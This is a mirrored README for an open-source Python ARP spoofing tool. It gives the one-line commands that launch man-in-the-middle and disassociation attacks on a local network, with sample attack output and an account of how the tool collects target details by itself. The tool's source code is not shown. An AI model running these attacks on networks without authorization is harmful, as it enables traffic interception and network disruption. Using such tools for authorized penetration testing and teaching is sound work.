项目作者: EONRaider

项目描述 :
A pure-Python ARP Cache Poisoning (a.k.a "ARP Spoofing") tool
高级语言: Python
项目地址: git://github.com/EONRaider/Arp-Spoofer.git
创建时间: 2020-10-31T12:22:16Z
项目社区:https://github.com/EONRaider/Arp-Spoofer

开源协议:GNU Affero General Public License v3.0

下载


Python 3 ARP Spoofing Tool

Python Version
OS
CodeFactor Grade
License

Reddit
Discord
Twitter

A pure-Python ARP Cache Poisoning (a.k.a. “ARP Spoofing”) tool that leverages
a low-level assembly of Ethernet II frames and ARP packets.

This application maintains no dependencies on third-party modules and can be
run by any Python 3.x interpreter.

Installation

Simply clone this repository with git clone and execute the arpspoof.py file
as described in the following Usage section.

  1. user@host:~/DIR$ git clone https://github.com/EONRaider/Arp-Spoofer.git

Usage

  1. arpspoof.py [-h] [-i INTERFACE] [--attackermac MAC] [--gatemac MAC]
  2. [--targetmac MAC] [--gateip IP] [--interval TIME] [-d | -f]
  3. TARGET_IP
  4. Execute ARP Cache Poisoning attacks (a.k.a "ARP Spoofing") on local networks.
  5. positional arguments:
  6. TARGET_IP IP address currently assigned to the target.
  7. optional arguments:
  8. -h, --help show this help message and exit
  9. -i INTERFACE, --interface INTERFACE
  10. Interface on the attacker machine to send packets
  11. from.
  12. --attackermac MAC MAC address of the NIC from which the attacker machine
  13. will send the spoofed ARP packets.
  14. --gatemac MAC MAC address of the NIC associated to the gateway.
  15. --targetmac MAC MAC address of the NIC associated to the target.
  16. --gateip IP IP address currently assigned to the gateway.
  17. --interval TIME Time in between each transmission of spoofed ARP
  18. packets (defaults to 0.5 seconds).
  19. --disassociate Execute a disassociation attack in which a randomized
  20. MAC address is set for the attacker machine,
  21. effectively making the target host send packets to a
  22. non-existent gateway.
  23. -f, --ipforward Temporarily enable forwarding of IPv4 packets on the
  24. attacker system until the next reboot. Set this to
  25. intercept information between the target host and the
  26. gateway, performing a man-in-the-middle attack.
  27. Requires administrator privileges.

Running the Application

METHOD I: “Too long, didn’t read”












Objective Perform the attack with a single command and script-kid our way
to victory
Execution sudo python3 arpspoof.py TARGET_IP -f

#

METHOD II: Detailed Usage

























Step 1 of 2
Objective Perform an ARP Cache Poisoning with
Man-in-the-middle (MITM)
attack against a target with IP address 10.0.1.6 on our
local network segment
Execution sudo python3 arpspoof.py 10.0.1.6 -f
Outcome Automatic configuration and subsequent transmission of spoofed ARP
packets until EOF signal (Ctrl-C). Refer to sample output below.
Observations Notice how the remaining settings are automatically obtained,
including a setup for forwarding of IPv4 packets to enable a MITM
attack (set by the -f switch)
  • Sample Output
  1. user@host:~$ sudo python3 arpspoof.py 10.0.1.6 -f
  2. [>>>] ARP Spoofing configuration:
  3. [+] IPv4 Forwarding .....................True
  4. [+] Interface .....................eth0
  5. [+] Attacker MAC ........08:92:27:dc:3a:71
  6. [+] Gateway IP .................10.0.1.1
  7. [+] Gateway MAC ........52:93:d0:92:c5:06
  8. [+] Target IP .................10.0.1.6
  9. [+] Target MAC ........91:8b:28:93:af:07
  10. [!] ARP packets ready. Execute the attack with these settings? (Y/N) y
  11. [+] ARP Spoofing attack initiated. Press Ctrl-C to abort.
























Step 2 of 2
Objective Check the traffic generated by the attack and make sure it is actually working
Execution Use an inspection tool such as Network Packet Sniffer
Outcome Refer to sample output below
Observations Check that packets #5 and #6 map the gateway and target IP addresses to the attacker MAC address (meaning that the attack was successful)
  • Sample Output
  1. [>] Packet #1 at 14:10:12:
  2. [+] MAC ......08:92:27:dc:3a:71 -> ff:ff:ff:ff:ff:ff
  3. [+] ARP Who has 10.0.1.6 ? -> Tell 10.0.1.5
  4. [>] Packet #2 at 14:10:12:
  5. [+] MAC ......91:8b:28:93:af:07 -> 08:92:27:dc:3a:71
  6. [+] ARP ...............10.0.1.6 -> Is at 91:8b:28:93:af:07
  7. [>] Packet #3 at 14:10:12:
  8. [+] MAC ......08:92:27:dc:3a:71 -> 91:8b:28:93:af:07
  9. [+] IPv4 ..............10.0.1.5 -> 10.0.1.6 | PROTO: UDP TTL: 64
  10. [+] UDP ..................52949 -> 54663
  11. [>] Packet #4 at 14:10:12:
  12. [+] MAC ......91:8b:28:93:af:07 -> 08:92:27:dc:3a:71
  13. [+] IPv4 ..............10.0.1.6 -> 10.0.1.5 | PROTO: ICMP TTL: 64
  14. [+] ICMP ..............10.0.1.6 -> 10.0.1.5 | Type: OTHER
  15. [>] Packet #5 at 14:10:18:
  16. [+] MAC ......08:92:27:dc:3a:71 -> 52:54:00:12:35:00
  17. [+] ARP ...............10.0.1.6 -> Is at 08:92:27:dc:3a:71
  18. [>] Packet #6 at 14:10:18:
  19. [+] MAC ......08:92:27:dc:3a:71 -> 91:8b:28:93:af:07
  20. [+] ARP ...............10.0.1.1 -> Is at 08:92:27:dc:3a:71

And that’s it! The attack will persist until otherwise aborted.

#

But how is this possible?

The simplest command for this tool consists of
sudo python3 arpspoof.py TARGET_IP

Then where do the remaining settings such as Target MAC, Gateway IP and
Attacker MAC come from? How is IPv4 forwarding enabled?

A brief explanation can be found in the docstring of the ARPSetupProxy
class in the
packets.py
file:

Performs a best-effort attempt to query the system and network for
information necessary to build the ARP attack packets. It allows the
user to initiate an attack by simply supplying the target’s IP
address
. All other required settings are looked up from the
attacker system’s ARP and routing tables and by probing ephemeral
ports on the target host.

This tool prioritizes the automated gathering of all information
required to initiate the attack, releasing the Penetration Tester from
going through all the manual processes required by similar tools.

With that in mind we have that the following operations are the ones
executed by the application to obtain each setting:

  • IPv4 Forwarding: Execute an overwriting of the value 0 to 1 in the
    file /proc/sys/net/ipv4/ip_forward.
  • Interface: Parse the attacker’s routing table and look for
    interfaces mapping valid routes to the gateway.
  • Attacker MAC: Bind to interface and query its name from socket
  • Gateway IP: Parse the attacker’s routing table and find the route
    with 0x0003 flag set.
  • Gateway MAC: Parse the attacker’s ARP table looking for devices
    with Gateway IP.
  • Target MAC: Send a UDP datagram with an empty byte string to a
    random ephemeral port on the target system (effectively making the
    attacker system execute an ARP request followed by an ICMP probe
    to the broadcast address) and then reading the newly written
    information from the ARP table.

The use of code contained in this repository, either in part or in its totality,
for engaging targets without prior mutual consent is illegal. It is
the end-user’s responsibility to obey all applicable local, state
and federal laws.

Developers assume no liability and are not
responsible for misuses or damages caused by any code contained
in this repository in any event that, accidentally or otherwise, it comes to
be utilized by a threat agent or unauthorized entity as a means to compromise
the security, privacy, confidentiality, integrity and/or availability of
systems and their associated resources by leveraging the exploitation of known
or unknown vulnerabilities present in said systems, including, but not limited
to, the implementation of security controls, human- or electronically-enabled.

The use of this code is only endorsed by the developers in those
circumstances directly related to educational environments or
authorized penetration testing engagements whose declared purpose is that
of finding and mitigating vulnerabilities in systems, limiting their exposure
to compromises and exploits employed by malicious agents as defined in their
respective threat models.